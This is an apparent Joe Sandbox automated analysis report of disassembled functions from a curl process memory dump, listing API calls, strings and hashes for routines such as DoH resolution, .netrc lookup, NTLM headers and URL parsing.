Opcode ID: b6f20a71cef1fdc3bae50c434db76d737409eec2807acdfb0355f4ec8a32f7c1
Instruction ID: 26c9f259d320c19d98a67d744078f79b0132b82c67ebc7c6fd874ca27e3dc34d
Opcode Fuzzy Hash: b6f20a71cef1fdc3bae50c434db76d737409eec2807acdfb0355f4ec8a32f7c1
Instruction Fuzzy Hash: DD514C36A00B8096FB54DF22E95438B73A4F748BA4F440529EF6A133A1DF7CD66AC740

Function 000000013F4BC730 Relevance: 13.6, APIs: 9, Instructions: 67sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F4BBDF4: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,000000013F49DA11,?,?,?,?,?,?,?,?,?,000000013F49553A), ref: 000000013F4BBE0B

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6119), ref: 000000013F4BC759
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6119), ref: 000000013F4BC764
MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6119), ref: 000000013F4BC77A
Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6119), ref: 000000013F4BC7B6
MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6119), ref: 000000013F4BC7C5
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6119), ref: 000000013F4BC7D7
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6119), ref: 000000013F4BC7E5

Part of subcall function 000000013F4BBDF4: GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,000000013F49DA11,?,?,?,?,?,?,?,?,?,000000013F49553A), ref: 000000013F4BBE34

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6119), ref: 000000013F4BC80A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A6119), ref: 000000013F4BC818

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
String ID:
API String ID: 1793959362-0
Opcode ID: 9fa129cf8a10a0d73ae2e213401e0a883c2230345965de49da55cd80e3c8a4de
Instruction ID: 1794ccbaf44421e35b97c1c61fc01a5af39f6e1f569f23a2edf0e751a594383f
Opcode Fuzzy Hash: 9fa129cf8a10a0d73ae2e213401e0a883c2230345965de49da55cd80e3c8a4de
Instruction Fuzzy Hash: 17215331F14A4982FE555B15E4543EBA3A0BB94FC1F488538EE8A47797EF2CCA478700

Function 000000013F49A254 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 427COMMON

Download Yara Rule

Strings

, xrefs: 000000013F49A489
%%%02x, xrefs: 000000013F49A605

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID:
String ID: $%%%02x
API String ID: 0-2848173732
Opcode ID: b3b62ac39e6e61bbcb52d112f825f1df93ae01170a8829b0007525cf0d16b262
Instruction ID: c2a13eeac1c9ffebdace8a8573078bb1e71ecd85643ad4ed314bc45ea71af440
Opcode Fuzzy Hash: b3b62ac39e6e61bbcb52d112f825f1df93ae01170a8829b0007525cf0d16b262
Instruction Fuzzy Hash: 5502EE32F0878486FB759B2595583EB67E0A746B98F58413DDE9A03BE1DA38CB47C300

Function 000000013F492DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F492E78
__swprintf_l.LIBCMT ref: 000000013F492F3C
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F492F9C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F492FB8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F492FDB

Strings

internal error: invalid pattern type (%d), xrefs: 000000013F492FA5
%0*lu, xrefs: 000000013F492F24

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free$__acrt_iob_func__swprintf_lstrtoul
String ID: %0*lu$internal error: invalid pattern type (%d)
API String ID: 147458867-449433499
Opcode ID: 7a5d36e5d39d3ca7f5e34a7ee781cb2d5ad5c681a6cb6dd27d853685f0762971
Instruction ID: 0bbb53832113be519000e3993eab0fbf24b91aae4c486f63d42f4dd58457011d
Opcode Fuzzy Hash: 7a5d36e5d39d3ca7f5e34a7ee781cb2d5ad5c681a6cb6dd27d853685f0762971
Instruction Fuzzy Hash: 0E515776B00A5489FB908FA5D8903EF27A1B709B98F48422DDE59577C9EA38C756D300

Function 000000013F48F2F0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 124COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,00000000,000000013F48F519,?,?,?,000000013F48F1CE,?,?,?,?,?,00000000), ref: 000000013F48F3BD
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,00000000,000000013F48F519,?,?,?,000000013F48F1CE,?,?,?,?,?,00000000), ref: 000000013F48F40E

Part of subcall function 000000013F48A7AC: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000014,00000000,000000013F489BD1), ref: 000000013F48A7D7

Strings

out of memory, xrefs: 000000013F48F3DE, 000000013F48F433
no URL specified!, xrefs: 000000013F48F4BD
SSL_CERT_DIR, xrefs: 000000013F48F3F7
SSL_CERT_FILE, xrefs: 000000013F48F456
CURL_CA_BUNDLE, xrefs: 000000013F48F3A6

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _strdup$fputs
String ID: CURL_CA_BUNDLE$SSL_CERT_DIR$SSL_CERT_FILE$no URL specified!$out of memory
API String ID: 4133441535-921570741
Opcode ID: f992a6a2405fb0675fec838efb5fb30836ef72bad299646b3daab79ae14bddd4
Instruction ID: c131a7a9460606ba2bf8e33f91e56671e79af86f5945a6a3f1d80619a3cdb03e
Opcode Fuzzy Hash: f992a6a2405fb0675fec838efb5fb30836ef72bad299646b3daab79ae14bddd4
Instruction Fuzzy Hash: 9A517031B01B8095FA61DB15A5503EB6AE0A764BE4F48413AED4D07BA6EF39CA87C340

Function 000000013F4D2444 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 108COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F4D2504
__swprintf_l.LIBCMT ref: 000000013F4D255A

Strings

TTL: %u seconds, xrefs: 000000013F4D2477
%s%02x%02x, xrefs: 000000013F4D2542
DoH A: %u.%u.%u.%u, xrefs: 000000013F4D24BF
CNAME: %s, xrefs: 000000013F4D25CA
DoH AAAA: , xrefs: 000000013F4D24F3

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_l
String ID: %s%02x%02x$CNAME: %s$DoH A: %u.%u.%u.%u$DoH AAAA: $TTL: %u seconds
API String ID: 1488884202-408633105
Opcode ID: af9628eb09a8a4b8b72db40548a2d0d273c778839f9fc3eaed13a981285f9ad7
Instruction ID: 98afbd12a99c3ee00e1bf86a4e41a9eaf48bdecc5e7ebe5714961e5cd3d783aa
Opcode Fuzzy Hash: af9628eb09a8a4b8b72db40548a2d0d273c778839f9fc3eaed13a981285f9ad7
Instruction Fuzzy Hash: 50418172A0468199EB60CF25E4117DBBB60F3457A5F44423AFE9A067DADB38C746CB10

Function 000000013F484150 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 66stringCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4841DD
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4841F1
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4841FC
ferror.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F484205
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F484216
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F48421E

Strings

stdin: %s, xrefs: 000000013F484228

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __acrt_iob_func$_errnoferrorfreadstrerror
String ID: stdin: %s
API String ID: 2463866935-3123201360
Opcode ID: 5ca1bf91eea2be8477dae442d6923a079f7cac26a512d9b0cf8293ae176da189
Instruction ID: 550d8d7b015a6d42db546f609fef030f46342d26f556cad6dccb2e0e8a201d6c
Opcode Fuzzy Hash: 5ca1bf91eea2be8477dae442d6923a079f7cac26a512d9b0cf8293ae176da189
Instruction Fuzzy Hash: 6421C472B01B8082EB449F16E94839A7B65E758FE0F044139EE1943BE9DE3DC242C340

Function 000000013F483C00 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F483C4F
_scwprintf.LIBCMT ref: 000000013F483C60
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F483CAE
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483CB8

Strings

._, xrefs: 000000013F483C19
%s\%c%s, xrefs: 000000013F483C48
%s\%s, xrefs: 000000013F483C59

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _scwprintf$_close_strdup
String ID: %s\%c%s$%s\%s$._
API String ID: 2153715164-4149339551
Opcode ID: affd7a11315e68f1c820cc6dcd05311ecf882c7cb253064f6f5f87bf9b8913ab
Instruction ID: d588e2a6ce198215c3e707e313ee0032546faf2433fa8654cd84f77d1bfb7e2e
Opcode Fuzzy Hash: affd7a11315e68f1c820cc6dcd05311ecf882c7cb253064f6f5f87bf9b8913ab
Instruction Fuzzy Hash: 48118E32B0965995EA01EF67E9443EBABA0AB84BD4F440438ED1D477A2EA39C247C340

Function 000000013F4BC4FC Relevance: 12.1, APIs: 8, Instructions: 99COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4BC530
_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 000000013F4BC549
_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 000000013F4BC55A
_mbsnbcpy.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 000000013F4BC5DB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4BC5F1
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4BC5FA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4BC630
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4BC645

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free$_mbschr_strdup$_mbsnbcpy
String ID:
API String ID: 698015193-0
Opcode ID: 202aedd203a6989fc41f4ac20ce68bfa5d7db459b5743780eee6bd3b79c45fba
Instruction ID: d2513e6f5fc58c1a24cd912840fe05b6af3f5d9f5a59f32811d48f1539302cec
Opcode Fuzzy Hash: 202aedd203a6989fc41f4ac20ce68bfa5d7db459b5743780eee6bd3b79c45fba
Instruction Fuzzy Hash: BF419331A02B4885FA15DF15A8547AA37A4FB89FD0F09563DDE5E07392EF3CD6868304

Function 000000013F48A3F0 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON

Download Yara Rule

APIs

FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F48A455
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F48A475
WSACleanup.WS2_32 ref: 000000013F48A48E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48A49E
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48A4B7
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48A4D0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48A4DE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48A503

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free$FreeLibraryfclose$Cleanup
String ID:
API String ID: 2673440117-0
Opcode ID: c8dba129fa9e4224a65ac5167fe942a4234cdd52bc3a0e15343bb17c425e0045
Instruction ID: d4211289f13fb2baa80c17cac6cf9ce712a47717e9415bd5e4580c2296fc05aa
Opcode Fuzzy Hash: c8dba129fa9e4224a65ac5167fe942a4234cdd52bc3a0e15343bb17c425e0045
Instruction Fuzzy Hash: 5B410C35A06B90A6FB55CF52E95839A37A0F744F60F08063CDA4903BA5DF78E6A6C304

Function 000000013F4D2610 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 263networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 000000013F4D2910

Strings

AAAA, xrefs: 000000013F4D2787
DoH: %s type %s for %s, xrefs: 000000013F4D2795
DoH Host name: %s, xrefs: 000000013F4D27DD
bad error code, xrefs: 000000013F4D2772
Could not DoH-resolve: %s, xrefs: 000000013F4D2676

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: htons
String ID: AAAA$Could not DoH-resolve: %s$DoH Host name: %s$DoH: %s type %s for %s$bad error code
API String ID: 4207154920-4260076447
Opcode ID: 7d633c1694b5483172282229e67d9e24285464f8e182ff21bc050942d7f66f87
Instruction ID: 1bafacaf1065fec83ec8eef806137ee41f947b11b5d5854e69bb8456475fb220
Opcode Fuzzy Hash: 7d633c1694b5483172282229e67d9e24285464f8e182ff21bc050942d7f66f87
Instruction Fuzzy Hash: C8C18C72A14B8086EB65CF15E4847DE73A4F784B88F54412AEF8A47796EF38C746CB00

Function 000000013F4A9DBC Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 236COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F4A9F0E
_scwprintf.LIBCMT ref: 000000013F4A9F7B

Part of subcall function 000000013F4C0804: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000198,?,00000190,?,00000000,00000000,?,000000013F4AA023), ref: 000000013F4C0892
Part of subcall function 000000013F4C0804: fgets.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4C08B3

Strings

%s%s_netrc, xrefs: 000000013F4A9F74
%s%s.netrc, xrefs: 000000013F4A9F07
HOME, xrefs: 000000013F4A9EE5
Couldn't find host %s in the %s file; using defaults, xrefs: 000000013F4AA13C

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _scwprintf$fgetsfopen
String ID: %s%s.netrc$%s%s_netrc$Couldn't find host %s in the %s file; using defaults$HOME
API String ID: 2363167223-3314400472
Opcode ID: dd9ba166b62d42bd89a43577f716b51f247fb6ed1caadbf030b1aa0a2d393612
Instruction ID: 8e309dfc47b9dea52476605fda4bd79ddfb9bd8e429790db423bd5790dad6926
Opcode Fuzzy Hash: dd9ba166b62d42bd89a43577f716b51f247fb6ed1caadbf030b1aa0a2d393612
Instruction Fuzzy Hash: D9B11636A05B8495FE629F21E8543DA73E0F748B84F48413AEE4E477A6DF38C65AC340

Function 000000013F4C9578 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F4C9764
_scwprintf.LIBCMT ref: 000000013F4C9828

Strings

NTLM, xrefs: 000000013F4C9584
Proxy-, xrefs: 000000013F4C9747, 000000013F4C980B
%sAuthorization: NTLM %s, xrefs: 000000013F4C975D, 000000013F4C9821
HTTP, xrefs: 000000013F4C9593

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _scwprintf
String ID: %sAuthorization: NTLM %s$HTTP$NTLM$Proxy-
API String ID: 1992661772-3948863929
Opcode ID: b0a948b9b0fea8cefa47e902086e63ea92802a118b3a249a9c980545b9e8ab5e
Instruction ID: 4eeb00f56fa614a3e99bbd16ab98e29a63d47989ba883394bb576dbfdfc45368
Opcode Fuzzy Hash: b0a948b9b0fea8cefa47e902086e63ea92802a118b3a249a9c980545b9e8ab5e
Instruction Fuzzy Hash: 06916B32A01B84A9EB00CF65E844BDA3BE4F744B98F04013AEE0D57B65DF38CA56C350

Function 000000013F4AA2D0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,000000013F4AAFB6,?,?,?,?,?,?), ref: 000000013F4AA395
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,000000013F4AAFB6,?,?,?,?,?,?), ref: 000000013F4AA444

Strings

Invalid IPv6 address format, xrefs: 000000013F4AA405
%25, xrefs: 000000013F4AA38B
Please URL encode %% as %%25, see RFC 6874., xrefs: 000000013F4AA39F
No valid port number in connect to host string (%s), xrefs: 000000013F4AA468

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: strncmpstrtol
String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
API String ID: 826613874-4202423297
Opcode ID: 1445fae2bb943633c9b3e89104484d1b11c1eecccc372fbc47c8b679525d860c
Instruction ID: d84ea9dc8a1c0a7ac93d13782bef0b4c7a6276ab3de32f8894e2acb178cf6117
Opcode Fuzzy Hash: 1445fae2bb943633c9b3e89104484d1b11c1eecccc372fbc47c8b679525d860c
Instruction Fuzzy Hash: 43519C76E05BC489FE528F1698543EA3B91A756B90F844039EA9A073D5EA2CC69FC700

Function 000000013F482DF4 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 152stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482E8F
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F482EAE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F482ED0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482F7E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482FA3

Strings

|<>"?*, xrefs: 000000013F482F0D
\\?\, xrefs: 000000013F482EC6

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free$mallocstrncmpstrncpy
String ID: \\?\$|<>"?*
API String ID: 2141947759-3264285191
Opcode ID: 0dfce110ae0fe89019561334145224715787a27e48da09fb880850aed99ea0e6
Instruction ID: 1c14d1ed06e9c0a859c001c7d1f620e170acce0c79a26304b62c86d5a5e44bec
Opcode Fuzzy Hash: 0dfce110ae0fe89019561334145224715787a27e48da09fb880850aed99ea0e6
Instruction Fuzzy Hash: 7A519B71E04B8185FB668E25E9003BBAE90A745B94F08813DDF55076D5EB7ECB83D304

Function 000000013F498CD4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151stringCOMMON

Download Yara Rule

APIs

strspn.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 000000013F498D41
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 000000013F498D7A
inet_pton.WS2_32 ref: 000000013F498E20
strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 000000013F498EC9

Strings

/:#?!@, xrefs: 000000013F498EBF
0123456789abcdefABCDEF:., xrefs: 000000013F498D37

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
